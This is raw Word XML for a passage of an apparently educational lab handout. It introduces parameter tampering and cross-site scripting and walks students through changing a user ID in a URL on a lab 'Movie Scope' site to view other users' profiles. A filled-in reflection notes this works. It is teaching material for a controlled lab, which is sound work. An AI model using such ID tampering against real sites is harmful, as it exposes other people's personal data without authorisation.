        <w:t>information is passed. Some cases, it might be a hidden tag in a form or a parameter in a URL. On capturing the flow, the attacked could easily change these parameters to surpass the security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EB1DFD" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BEA15E7" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="839" w:right="1437"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Generally, a parameter tampering attack would check on the int</w:t>
      </w:r>
      <w:r>
        <w:t>egrity part of the application and may lead to SQL injection attacks, cross-site scripting attacks and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E571216" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D5DC7A8" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="839" w:right="1433"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>By attempting XSS, the attacker might inject client side scripts to the users using malicious scripts (it might be a Javascript/ Flash/ basic HTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> etc).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C16700" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3399454A" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="839" w:right="1434"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Looking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>parameter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tampering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Cross-site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>initial methods for an attacker to attempt an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A03FD01" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260DD007" w14:textId="00535B9C" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="839" w:right="1438"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="15736832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11EA0F53" wp14:editId="63DBBFA0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>401955</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="44" name="Line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8E26490" id="Line 29" o:spid="_x0000_s1026" style="position:absolute;z-index:157368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54.65pt,31.65pt" to="595.3pt,3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qxzAEAAIQDAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L06MJmiNOD0k6y7Z&#10;FqDdBzCSbAuTRUFS4uTvR8lJ2rW3YT4Iokg+Pj7Sy8dTb9hR+aDR1nw2mXKmrECpbVvzXy9PX+45&#10;CxGsBINW1fysAn9cff60HFylSuzQSOUZgdhQDa7mXYyuKoogOtVDmKBTlpwN+h4imb4tpIeB0HtT&#10;lNPpohjQS+dRqBDodTM6+SrjN40S8WfTBBWZqTlxi/n0+dyns1gtoWo9uE6LCw34BxY9aEtFb1Ab&#10;iMAOXn+A6rXwGLCJE4F9gU2jhco9UDez6btunjtwKvdC4gR3kyn8P1jx47jzTMua391xZqGnGW21&#10;Vax8SNoMLlQUsrY7n7oTJ/vstih+B2Zx3YFtVeb4cnaUN0sZxV8pyQiOKuyH7ygpBg4Rs1CnxvcJ&#10;kiRgpzyP820e6hSZoMfF/WJRzueciauvgOqa6HyI3xT2LF1qboh0BobjNsREBKprSKpj8Ukbk8dt&#10;LBtq/jAv5zkhoNEyOVNY8O1+bTw7QlqY/OWuyPM2LCFvIHRjXHaNq+TxYGWu0imQXy/3CNqMd2Jl&#10;7EWlJMwo8R7leeev6tGoM/3LWqZdemvn7NefZ/UHAAD//wMAUEsDBBQABgAIAAAAIQB2JRaN3QAA&#10;AAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT8MwDIXvSPyHyEhcJpZslSpWmk4I6I0LG4ir15q2&#10;onG6JtsKvx5PHOBkPfvp+Xv5enK9OtIYOs8WFnMDirjydceNhddteXMLKkTkGnvPZOGLAqyLy4sc&#10;s9qf+IWOm9goCeGQoYU2xiHTOlQtOQxzPxDL7cOPDqPIsdH1iCcJd71eGpNqhx3LhxYHemip+twc&#10;nIVQvtG+/J5VM/OeNJ6W+8fnJ7T2+mq6vwMVaYp/ZjjjCzoUwrTzB66D6kWbVSJWC2ki82xYrEwK&#10;ave70UWu/1cofgAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAA&#10;AAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCpxMqxzAEAAIQDAAAOAAAA&#10;AAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQB2JRaN3QAAAAoBAAAP&#10;AAAAAAAAAAAAAAAAACYEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAMAUAAAAA&#10;">
                <w10:wrap anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:t>Use any tools/ methods to find out the parameter tampering and cross-site scripting vulnerabilities in our lab</w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:t xml:space="preserve"> controlled web applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF26D03" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:sectPr w:rsidR="00D02F84">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="414D0F70" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44562590" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:right="1436"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Make sure you have Movie Scope website, Win Server 2016, 2012, Win 10 Setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EBD20A" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login Win Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE5A378" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login Win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BD2AA1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Browser </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>http://www.moviescope.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="34193C07" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:ind w:right="1432"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login using your user credentials. (created while setting up the database. Refer to our previous lab setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>instruction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4720B4B4" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>You should be successfully logged in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC14744" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Click on the View Profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Op</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD7C86E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>You should see your user’s profile with ID, names, emails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A30FDCD" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:ind w:right="1436"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Did you observe anything valuable here in an attacker’s perspective…. (Hint: Remember our previous lecture session.) If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>yes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54857325" w14:textId="31C3F83F" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1663"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B5AB01A" wp14:editId="604AD46B">
                <wp:extent cx="5227320" cy="525780"/>
                <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                <wp:docPr id="43"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27320" cy="525780"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="DADAD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0309446" w14:textId="2E41E6DA" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                            <w:pPr>
                              <w:spacing w:line="274" w:lineRule="exact"/>
                              <w:ind w:left="28"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Record your reflection here:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="31420E77" w14:textId="690FE7CE" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:spacing w:line="274" w:lineRule="exact"/>
                              <w:ind w:left="28"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Changing the 1 to a different number will give another users details</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="5B5AB01A" id="Text Box 28" o:spid="_x0000_s1030" type="#_x0000_t202" style="width:411.6pt;height:41.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To0AgIAAOgDAAAOAAAAZHJzL2Uyb0RvYy54bWysU9uO0zAQfUfiHyy/07RZylZR01VptQhp&#10;YZF2+QDHcRoLx2PGbpPy9YydpqyWN4QiWeO5HM85M1nfDZ1hJ4Vegy35YjbnTFkJtbaHkn9/vn+3&#10;4swHYWthwKqSn5Xnd5u3b9a9K1QOLZhaISMQ64velbwNwRVZ5mWrOuFn4JSlYAPYiUBXPGQ1ip7Q&#10;O5Pl8/mHrAesHYJU3pN3Pwb5JuE3jZLhsWm8CsyUnHoL6cR0VvHMNmtRHFC4VstLG+IfuuiEtvTo&#10;FWovgmBH1H9BdVoieGjCTEKXQdNoqRIHYrOYv2Lz1AqnEhcSx7urTP7/wcqvp2/IdF3y9zecWdHR&#10;jJ7VENhHGFi+ivr0zheU9uQoMQzkpzknrt49gPzhmYVdK+xBbRGhb5Woqb9FrMxelI44PoJU/Reo&#10;6R1xDJCAhga7KB7JwQid5nS+zib2Ism5zPPbm5xCkmLLfHm7SsPLRDFVO/Thk4KORaPkSLNP6OL0&#10;4EPsRhRTSnzMg9H1vTYmXfBQ7Qyyk6A92W/jlwi8SjM2JluIZSNi9CSakdnIMQzVkBTNJ/UqqM/E&#10;G2FcP/pdyGgBf3HW0+qV3P88ClScmc+WtIt7Ohk4GdVkCCuptOSBs9HchXGfjw71oSXkcToWtqRv&#10;oxP1OIixi0u7tE5Jkcvqx319eU9Zf37QzW8AAAD//wMAUEsDBBQABgAIAAAAIQD77Evz2gAAAAQB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAEIXvgv9hGcGL2E0jlBCzKaJ4E9Tagt622WkSmp2N&#10;u9tu/PdOvdTLMMMb3vtetZzsII7oQ+9IwXyWgUBqnOmpVbD+eL4tQISoyejBESr4wQDL+vKi0qVx&#10;id7xuIqtYBMKpVbQxTiWUoamQ6vDzI1IrO2ctzry6VtpvE5sbgeZZ9lCWt0TJ3R6xMcOm/3qYDn3&#10;K82/b/avm2J8Sujx5U1+7pJS11fTwz2IiFM8P8MJn9GhZqatO5AJYlDAReLfZK3I73IQ29NSgKwr&#10;+R++/gUAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAA&#10;W0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAA&#10;AAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA5LTo0AgIAAOgDAAAOAAAAAAAAAAAA&#10;AAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQD77Evz2gAAAAQBAAAPAAAAAAAA&#10;AAAAAAAAAFwEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAYwUAAAAA&#10;" fillcolor="#dadada" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="00309446" w14:textId="2E41E6DA" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                      <w:pPr>
                        <w:spacing w:line="274" w:lineRule="exact"/>
                        <w:ind w:left="28"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Record your reflection here:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="31420E77" w14:textId="690FE7CE" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:spacing w:line="274" w:lineRule="exact"/>
                        <w:ind w:left="28"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Changing the 1 to a different number will give another users details</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9F2BD5" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:spacing w:line="247" w:lineRule="exact"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>If no, (no worries…) but be careful next time…Keep watching…and follow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B61589A" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1692"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>steps below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4090FE10" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Did you look at your ID displayed in the address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bar?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156F77CB" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:ind w:right="1435"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Just, change the id to another value (you should have created more users while setting up. If not, please go back to your previous lab instructions and create users in moviescope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70536143" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:ind w:left="1691" w:right="1435"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>You should now get the details of the user who belong to the ID whi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ch you have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>typed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>example:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
